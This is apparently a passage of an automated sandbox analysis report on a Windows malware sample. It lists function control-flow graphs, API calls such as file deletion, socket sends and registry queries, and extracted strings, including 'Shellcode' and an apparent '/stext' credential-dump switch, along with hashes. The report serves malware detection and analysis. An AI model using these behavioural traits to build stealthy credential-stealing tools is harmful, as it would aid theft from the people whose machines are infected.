                                                                                                                                                                control_flow_graph 965 70f08-70f53 GetModuleFileNameW call 6210e * 3 972 70f57-70fcd call 79b58 call 61fce call 6cadf call 62000 call 79b58 call 61fce call 6cadf call 62000 call 79b58 call 61fce call 6cadf call 62000 965->972 996 70fd2-71052 call 61fce call 642a7 call 6442d call 64451 call 630df call 61f24 call 7689b call 61f29 * 4 972->996 1019 71054-7105c Sleep 996->1019 1020 71062 996->1020 1019->996 1019->1020 1021 71064-710e4 call 61fce call 642a7 call 6442d call 64451 call 630df call 61f24 call 7689b call 61f29 * 4 1020->1021 1044 710e6-710ee Sleep 1021->1044 1045 710f4 1021->1045 1044->1021 1044->1045 1046 710f6-71176 call 61fce call 642a7 call 6442d call 64451 call 630df call 61f24 call 7689b call 61f29 * 4 1045->1046 1069 71186-711a7 1046->1069 1070 71178-71180 Sleep 1046->1070 1071 711aa-711c4 call 61f24 call 7a6ef 1069->1071 1070->1046 1070->1069 1076 711c6-711d4 call 61f24 DeleteFileW 1071->1076 1077 711da-711f4 call 61f24 call 7a6ef 1071->1077 1076->1077 1084 711f6-7120d call 61f24 DeleteFileW 1077->1084 1085 7120f 1077->1085 1087 71212-7122c call 61f24 call 7a6ef 1084->1087 1085->1087 1093 71244-71246 1087->1093 1094 7122e-7123e call 61f24 DeleteFileW 1087->1094 1096 71252-7125d Sleep 1093->1096 1097 71248-7124a 1093->1097 1094->1093 1096->1071 1100 71263-71273 call 66bc4 1096->1100 1097->1096 1099 7124c-71250 1097->1099 1099->1096 1099->1100 1103 71275-71282 call 66bc4 1100->1103 1104 712ca-712e6 call 61f29 * 3 1100->1104 1103->1104 1110 71284-71291 call 66bc4 1103->1110 1116 712eb-71345 call 6b4b6 call 61f24 call 62125 call 715cd call 61f29 call 65c55 1104->1116 1110->1104 1115 71293-712c2 Sleep call 61f29 * 3 1110->1115 1130 70f55 1115->1130 1131 712c8 1115->1131 1137 7147f-71516 call 79eeb call 62ff0 call 62fcc * 6 call 62f56 call 64be3 1116->1137 1138 7134b-7147a call 79eeb call 79d59 call 62ff0 call 62fcc * 6 call 62f56 call 62fcc call 62f56 call 64be3 call 62000 * 10 1116->1138 1130->972 1131->1116 1178 7151b-7155f call 62000 * 7 1137->1178 1207 71562-715cc call 62000 call 61f29 call 62000 * 9 1138->1207 1178->1207
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00070F23
                                                                                                                                                                  • Part of subcall function 00079B58: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,000641A5), ref: 00079B7F
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(0006421E,?,?,0006421E,000C2544), ref: 000768B1
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(000C2544,?,?,0006421E,000C2544), ref: 000768BA
                                                                                                                                                                • Sleep.KERNEL32(0000000A,000C2544), ref: 00071056
                                                                                                                                                                • Sleep.KERNEL32(0000000A,000C2544), ref: 000710E8
                                                                                                                                                                • Sleep.KERNEL32(0000000A,000C2544), ref: 0007117A
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 000711D4
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00071207
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0007123E
                                                                                                                                                                • Sleep.KERNEL32(000001F4,000C2544,000C2544,000C2544), ref: 00071257
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00071295
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                • String ID: /stext "
                                                                                                                                                                • API String ID: 1223786279-3856184850
                                                                                                                                                                • Opcode ID: 4eb6ddbb9e2f0dbe0b981cc2de976d83d71d2368b9443810f2e9af3d11ad70f4
                                                                                                                                                                • Instruction ID: 827edbddac8713a0d4e5b47856c53a4b0741d2c9917f0779db9d7ed6decfe6dd
                                                                                                                                                                • Opcode Fuzzy Hash: 4eb6ddbb9e2f0dbe0b981cc2de976d83d71d2368b9443810f2e9af3d11ad70f4
                                                                                                                                                                • Instruction Fuzzy Hash: 07023131E141189ADB18FBA4DC92BEDB3B6AF54300F5481A9F40AA7193EF345F89CB51
                                                                                                                                                                Function 0006CB2B Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1242 6cb2b-6cb50 call 61fa6 1245 6cb56 1242->1245 1246 6cc7a-6cd12 call 61f24 GetLongPathNameW call 642a7 * 2 call 6cec8 call 63069 * 2 call 61f29 * 5 1242->1246 1247 6cc56-6cc5b call 99a4f 1245->1247 1248 6cb67-6cb75 call 79895 call 61f33 1245->1248 1249 6cc65 1245->1249 1250 6cb92-6cb97 1245->1250 1251 6cc4f-6cc54 1245->1251 1252 6cb9c-6cba3 call 7a124 1245->1252 1253 6cb5d-6cb62 1245->1253 1254 6cb88-6cb8d 1245->1254 1255 6cc48-6cc4d 1245->1255 1262 6cc60-6cc63 1247->1262 1273 6cb7a 1248->1273 1257 6cc6a-6cc6f call 99a4f 1249->1257 1250->1257 1251->1257 1271 6cbf7-6cc43 call 642a7 call 99a4f call 642a7 call 63069 call 61f33 call 61f29 * 2 1252->1271 1272 6cba5-6cbf5 call 642a7 call 99a4f call 642a7 call 63069 call 61f33 call 61f29 * 2 1252->1272 1253->1257 1254->1257 1255->1257 1267 6cc70-6cc75 call 68ab3 1257->1267 1262->1249 1262->1267 1267->1246 1271->1273 1279 6cb7e-6cb83 call 61f29 1272->1279 1273->1279 1279->1246
                                                                                                                                                                APIs
                                                                                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0006CC91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongNamePath
                                                                                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                • API String ID: 82841172-425784914
                                                                                                                                                                • Opcode ID: 09d9c3022819989d9feb43685d6425e6ca312b9aed5e6f9b0e1568a7bd0b03e9
                                                                                                                                                                • Instruction ID: e921a6d82dc0596fac3c9489eb2bf2cad702628fe45d6de17351274c37de261b
                                                                                                                                                                • Opcode Fuzzy Hash: 09d9c3022819989d9feb43685d6425e6ca312b9aed5e6f9b0e1568a7bd0b03e9
                                                                                                                                                                • Instruction Fuzzy Hash: F4417C321182409AD218FB64DCA3DFFB3AAAF91710F14452EF586960E3EF709F49C652
                                                                                                                                                                Function 6FE90A1D Relevance: 13.6, APIs: 9, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1388 6fe90a1d-6fe90a30 call 6fe912b0 1391 6fe90a32-6fe90a34 1388->1391 1392 6fe90a36-6fe90a58 call 6fe90e9a 1388->1392 1393 6fe90a9f-6fe90aae 1391->1393 1396 6fe90a5a-6fe90a9d call 6fe90f65 call 6fe90e27 call 6fe9127d call 6fe90ab2 call 6fe91106 call 6fe90abf 1392->1396 1397 6fe90ac5-6fe90ade call 6fe91134 call 6fe912b0 1392->1397 1396->1393 1408 6fe90aef-6fe90af6 1397->1408 1409 6fe90ae0-6fe90ae6 1397->1409 1412 6fe90af8-6fe90afb 1408->1412 1413 6fe90b02-6fe90b16 dllmain_raw 1408->1413 1409->1408 1411 6fe90ae8-6fe90aea 1409->1411 1415 6fe90bc8-6fe90bd7 1411->1415 1412->1413 1416 6fe90afd-6fe90b00 1412->1416 1417 6fe90b1c-6fe90b2d dllmain_crt_dispatch 1413->1417 1418 6fe90bbf-6fe90bc6 1413->1418 1420 6fe90b33-6fe90b38 call 6fe4a0a0 1416->1420 1417->1418 1417->1420 1418->1415 1425 6fe90b3d-6fe90b45 1420->1425 1426 6fe90b6e-6fe90b70 1425->1426 1427 6fe90b47-6fe90b49 1425->1427 1430 6fe90b72-6fe90b75 1426->1430 1431 6fe90b77-6fe90b88 dllmain_crt_dispatch 1426->1431 1427->1426 1429 6fe90b4b-6fe90b69 call 6fe4a0a0 call 6fe90a1d dllmain_raw 1427->1429 1429->1426 1430->1418 1430->1431 1431->1418 1433 6fe90b8a-6fe90bbc dllmain_raw 1431->1433 1433->1418
                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6FE90A64
                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6FE90A7E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2442719207-0
                                                                                                                                                                • Opcode ID: 5eb4fb3d9d0f87546aa941cc244fc80d166b06c7ace0026a4080f1516d572d60
                                                                                                                                                                • Instruction ID: 5f785698d31dfa4f305ecd21783948ddde229d146823e85cda59089cb8ae265d
                                                                                                                                                                • Opcode Fuzzy Hash: 5eb4fb3d9d0f87546aa941cc244fc80d166b06c7ace0026a4080f1516d572d60
                                                                                                                                                                • Instruction Fuzzy Hash: 3141D172D04719AFDB218FB9C800B9E7E79EF817A8F60411EEA1567280D7705D018BF0
                                                                                                                                                                Function 000795A7 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1438 795a7-795fe call 7a124 call 71976 call 6200a call 62000 call 66b7b 1449 79641-7964a 1438->1449 1450 79600-7960f call 71976 1438->1450 1452 79653 1449->1452 1453 7964c-79651 1449->1453 1454 79614-7962b call 61fce StrToIntA 1450->1454 1455 79658-79663 call 654ac 1452->1455 1453->1455 1460 7962d-79636 call 7b187 1454->1460 1461 79639-7963c call 62000 1454->1461 1460->1461 1461->1449
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007A124: GetCurrentProcess.KERNEL32(000D2318,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A135
                                                                                                                                                                  • Part of subcall function 0007A124: IsWow64Process.KERNEL32(00000000,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A13C
                                                                                                                                                                  • Part of subcall function 00071976: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,000D2318,00000000,Shellcode), ref: 0007199A
                                                                                                                                                                  • Part of subcall function 00071976: RegQueryValueExA.KERNEL32(000D2318,00000000,00000000,00000000,?,00000400), ref: 000719B7
                                                                                                                                                                  • Part of subcall function 00071976: RegCloseKey.KERNEL32(000D2318), ref: 000719C2
                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,000C8964,00000000,00000000,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 00079620
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Shellcode
                                                                                                                                                                • API String ID: 782494840-2980324170
                                                                                                                                                                • Opcode ID: d1870606d89488e2af253c1eb4ff4fb51e4be0beef5128581eaadcbd6ef6dd5c
                                                                                                                                                                • Instruction ID: c80be677de27a6360fc0c1a0d7e768e7f529b13599f2eca9ebc5018ad21af469
                                                                                                                                                                • Opcode Fuzzy Hash: d1870606d89488e2af253c1eb4ff4fb51e4be0beef5128581eaadcbd6ef6dd5c
                                                                                                                                                                • Instruction Fuzzy Hash: 00112961E042446AE600B764DC57FFF775ACB90300F58C129F609A61D3EE680946C3AB
                                                                                                                                                                Function 6FE90ACD Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1499 6fe90acd-6fe90ade call 6fe912b0 1502 6fe90aef-6fe90af6 1499->1502 1503 6fe90ae0-6fe90ae6 1499->1503 1505 6fe90af8-6fe90afb 1502->1505 1506 6fe90b02-6fe90b16 dllmain_raw 1502->1506 1503->1502 1504 6fe90ae8-6fe90aea 1503->1504 1507 6fe90bc8-6fe90bd7 1504->1507 1505->1506 1508 6fe90afd-6fe90b00 1505->1508 1509 6fe90b1c-6fe90b2d dllmain_crt_dispatch 1506->1509 1510 6fe90bbf-6fe90bc6 1506->1510 1511 6fe90b33-6fe90b38 call 6fe4a0a0 1508->1511 1509->1510 1509->1511 1510->1507 1513 6fe90b3d-6fe90b45 1511->1513 1514 6fe90b6e-6fe90b70 1513->1514 1515 6fe90b47-6fe90b49 1513->1515 1517 6fe90b72-6fe90b75 1514->1517 1518 6fe90b77-6fe90b88 dllmain_crt_dispatch 1514->1518 1515->1514 1516 6fe90b4b-6fe90b69 call 6fe4a0a0 call 6fe90a1d dllmain_raw 1515->1516 1516->1514 1517->1510 1517->1518 1518->1510 1520 6fe90b8a-6fe90bbc dllmain_raw 1518->1520 1520->1510
                                                                                                                                                                APIs
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6FE90B0A
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6FE90B21
                                                                                                                                                                • DllMain.G2M(?,00000001,00000000,?,00000001,00000000,?,00000001,00000000,6FEBB280,0000000C,00000007,6FEBB258,00000010,6FE90911,?), ref: 6FE90B38
                                                                                                                                                                • DllMain.G2M(?,00000000,00000000,?,00000001,00000000,?,00000001,00000000,6FEBB280,0000000C,00000007,6FEBB258,00000010,6FE90911,?), ref: 6FE90B50
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6FE90B69
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6FE90B7C
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6FE90B8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: dllmain_raw$Maindllmain_crt_dispatch
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2381195575-0
                                                                                                                                                                • Opcode ID: 7132395ffea7b9c83959fe1a947dd18994f5e97074d3c595fc273959fa1a1dd9
                                                                                                                                                                • Instruction ID: c95f28b87921dbb896b977cf45f79bbe96625a9e84de487677574e3143ba7d97
                                                                                                                                                                • Opcode Fuzzy Hash: 7132395ffea7b9c83959fe1a947dd18994f5e97074d3c595fc273959fa1a1dd9
                                                                                                                                                                • Instruction Fuzzy Hash: 59219172D01729AFDB218F74C840EAF3E79DB81A9CB605119FA156B250E7309D418BF0
                                                                                                                                                                Function 6FE7CA20 Relevance: 10.6, APIs: 7, Instructions: 65networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6FE7CA4D
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6FE7CA65
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000001), ref: 6FE7CA83
                                                                                                                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 6FE7CA95
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6FE7CAAC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7CABD
                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 6FE7CACD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3114377017-0
                                                                                                                                                                • Opcode ID: 4ea867e60aaedf801132d83780a77ee990f933f8ce84418902a0fee417a995d4
                                                                                                                                                                • Instruction ID: 0cc1cba124c8068d1467ea541607e49a484fac08985548482c9d92cf91605d39
                                                                                                                                                                • Opcode Fuzzy Hash: 4ea867e60aaedf801132d83780a77ee990f933f8ce84418902a0fee417a995d4
                                                                                                                                                                • Instruction Fuzzy Hash: 89115170344700ABEB308F2C9D49B5A7EA8EB43B22F20451AF56AD72C0DBB5A851C760
                                                                                                                                                                Function 6FE7C180 Relevance: 9.2, APIs: 6, Instructions: 178fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00120114,FFFFFFFF,?,?,00000000,00000000), ref: 6FE7C2E8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C306
                                                                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000006,00000000,00000008), ref: 6FE7C331
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C352
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C380
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6FE7C38D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1617036312-0
                                                                                                                                                                • Opcode ID: ba95942971d4a749f8a129d9493d53f65fde7221cbaa93d2b84ddb74870b7927
                                                                                                                                                                • Instruction ID: f5ea0abc49ff43545b8330d44ce4ac7d915cdd22fd660787ee18b2160a9919f4
                                                                                                                                                                • Opcode Fuzzy Hash: ba95942971d4a749f8a129d9493d53f65fde7221cbaa93d2b84ddb74870b7927
                                                                                                                                                                • Instruction Fuzzy Hash: 1361C6706087809BE721CF6CC48075B7FE9AFC6318F24855EE8998B385EB30E955C751
                                                                                                                                                                Function 6FE74280 Relevance: 9.1, APIs: 6, Instructions: 111timesleepsynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE742AB
                                                                                                                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74311
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE7431E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74327
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74338
                                                                                                                                                                • Sleep.KERNEL32(FFFFFFFF,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74399
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2261246915-0
                                                                                                                                                                • Opcode ID: 4fa1ef3d0a162ac68694ffae96f69b1ab90007deee41cf9005d591238e506298
                                                                                                                                                                • Instruction ID: 6bc646bb2dad9ab5c19cef2f12b864d35235fce069269c4a5ecbc1c59b3044c9
                                                                                                                                                                • Opcode Fuzzy Hash: 4fa1ef3d0a162ac68694ffae96f69b1ab90007deee41cf9005d591238e506298
                                                                                                                                                                • Instruction Fuzzy Hash: B131E331700304A7DB248E2D8CC5B9E3FA9AB8B724F65823AF92CDB3D0DA7498548751
                                                                                                                                                                Function 6FE6958D Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 331fileCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE693B0: GetSystemInfo.KERNEL32 ref: 6FE69479
                                                                                                                                                                • CreateFileMappingW.KERNEL32 ref: 6FE6990F
                                                                                                                                                                • MapViewOfFile.KERNEL32 ref: 6FE69A01
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateInfoMappingSystemView
                                                                                                                                                                • String ID: "$@
                                                                                                                                                                • API String ID: 3466721412-1136454570
                                                                                                                                                                • Opcode ID: c7eb9be680bd7b15f16886ce5a7bdb02d63966e1d1e01109bbf4a03544f02e95
                                                                                                                                                                • Instruction ID: f6544443de3dba9063eda6a24bd67b4fadce33eaa3c0b09af7ee323fa906c042
